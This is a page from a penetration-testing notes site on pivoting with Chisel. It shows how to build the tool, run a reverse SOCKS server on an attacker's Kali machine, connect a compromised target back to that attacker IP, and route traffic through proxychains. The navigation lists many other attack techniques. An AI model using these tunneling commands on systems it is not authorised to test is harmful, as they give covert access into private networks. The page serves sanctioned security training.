Particle42
  • 🔬Network Enumeration
    • NMAP
    • TCPdump
  • 🔭Website Enumeration
    • Passive Information Gathering
    • Subdomain Enumeration
  • 🖥️Web Application
    • URL & App Scan
    • Subdomain/Vhost Fuzz
    • Login Hack
    • Cross Site Scripting
    • Directory Traversal
    • Local File Inclusion
    • Remote File Inclusion
    • PHP Wrappers
    • SQL Injection
      • Bypass Authentication
      • Database Enumeration
      • Code Execution Via Injection
      • SQL Injection Tools
      • Other Resources
    • NOSQL Injection
      • Bypass Authentication
    • WordPress Scanner
    • Hints & Easter Eggs
  • 🎣Phishing
    • Client Info Gathering
    • HTA
    • Word Macros
    • Windows Library Files
  • 🪟Windows
    • Enumeration & PE Quick Ref
    • Enumeration
      • Users
      • Powershell History
      • System Details
      • Applications & Services
      • Files & Filesystems
      • Cached Creds
    • Windows PE
      • Windows PE Checklist
      • Service Binary Hijacking
      • Important Files
      • Service DLL Hijacking
      • Unquoted Service Paths
      • Other PE Methods
      • Finding PE Vulns
      • SeImpersonatePrivilege
      • Bypassuac using Bypassuac.exe
      • Bypassuac using eventviewer.exe
      • Rasta Watson
    • Windows Remote Access
  • 📂Active Directory
    • About
    • Important Definitions
    • Exploitation Methodology
    • AD Kerberos
      • Invoke-Kerberoast - Shortcut
    • Domain Recon
      • Auto Recon
    • AD Authentication Attacks
      • Password Guessing
      • Creating & Cracking TGS
      • Kerberoasting
    • Lateral Movement
      • Pass the Hash
      • Overpass the Hash
      • Pass the Ticket
      • Distributed Component Object Model
      • Golden Ticket
      • Shadow Copy
      • Domain Controller Sync
      • Windows Management Instrumentation
      • PowerShell Remoting
    • All Commands, Tools & Scripts
      • Using Crackmapexec
      • Using Powerview
      • Important Scripts & Links
  • 🍺Buffer Over Flow
    • Finding EIP Position
    • Eliminating Bad Characters
    • Finding Return Address
    • Payload for BOF
  • 🐧Linux
    • Enumeration
      • Users
      • Encrypted Files
      • System Info
      • Files & Filesystems
      • Applications & Services
    • Attack Vectors
      • Authorised Keys
    • Linux PE
      • Enumeration Commands
      • Finding PE Vulns
      • Check Sudo List
      • Add User to Passwd File
      • SUIDs
      • Tasks with Wildcard
      • Dirty Cow
      • DirtyPipe
      • Insecure File Permissions
      • Enumerating Processes
    • Quick Commands
  • Services
    • SMB
      • Find Server Version
      • Directory Traversal using Symlink
      • Enable Passwordless SMB Access
    • MSSQL
    • MYSQL
    • PHPLiteAdmin
    • SSH
      • Limited Keys Issue
    • SMTP
      • Sending Email
    • Webdav
    • DNS
      • DNS Recon
  • ↗️Pivoting
    • Bringing Internet Access
    • Port Forwarding
      • Local Port Forwarding
      • Remote Port Forwarding
      • Dynamic Port Forwarding
    • HTTP Tunnel-ing
    • DNS Tunneling
    • Chisel
    • Ligolo-NG
  • 🔑Passwords
    • Wordlist Generation
    • HTTP Applications
    • OS Login
    • Password Cracking
      • Using Hashes Directly
      • Cracking Hashes
    • SAM & System
  • 🛠️Practical Tools
    • Remote Shell
      • Alternate Reverse Shells
      • Move to Interactive Shell
    • File Transfers
      • Quick Webservers
    • CURL
    • Payloads
      • MSFVenom
      • Veil Framework
    • Crafty Executable
    • Metasploit
      • Discovery
    • IMPACKET
      • MSSQL-Client
    • Clever Alternatives
  • 🚀Privilege Escalation
    • General Info
  • ⚡Resources
    • Exploits
Powered by GitBook
On this page
  • Building Chisel
  • Download Binary
  • Creating a Tunnel

Was this helpful?

  1. Pivoting

Chisel

Master Tunneling

PreviousDNS TunnelingNextLigolo-NG

Last updated 1 year ago

Was this helpful?

The methods discussed in the previous sections either are restricted to creating a pivot to access a single port/service or create dynamic port forwarding when the intermediate machine(compromised one) is a Linux machine using proxy chains and SSH.

Chisel comes in handy when the intermediate system is Windows and it even works equally great with a Linux system.

Building Chisel

Chisel source code is available from Github and it can be be downloaded to be compiled for Windows or Linux. Here are the steps to follow to build chisel.

Clone the Chisel library from the following link,

sudo git clone https://github.com/jpillora/chisel.git /opt/chisel
cd /opt/chisel

Next we compile it for Windows using Go Lang. If you don't have Go Lang you can use the following link to get it installed,

Use the following command to create an executable,

GOOS=windows GOARCH=amd64 go build -ldflags="-s -w" .

Next we can use Go Lang again to build for Linux using the following command,

go build -ldflags="-s -w" .

Download Binary

If you are having trouble building it yourself, then the executables can be downloaded from the following link,

Creating a Tunnel

The following commands are to create dynamic port forwarding meaning with this tunnel you will be able to access any system and any port through proxychains and Chisel.

On the attacker system (Kali),

./chisel server -p 8080 --socks5 --reverse

Don't forget to transfer the binary to the target system,

chisel client 192.168.49.100:8080 R:socks

Make the following changes in the proxychains config file, which can be located in "/etc/proxychains.conf" or "/etc/proxychains4.conf"(config filename could be different based on the version),

[ProxyList]
socks5 127.0.0.1 1080

Now you can test connecting to any system that you like using proxychains,

proxychains -q telnet 192.178.100.100 80

↗️
How to Install GoLang on Kali Linux - Kali Linux TutorialKali Linux Tutorial
Release v1.7.3 · jpillora/chiselGitHub
Tunneling with Chisel and SSF0xdf hacks stuff
Logo
Logo
Logo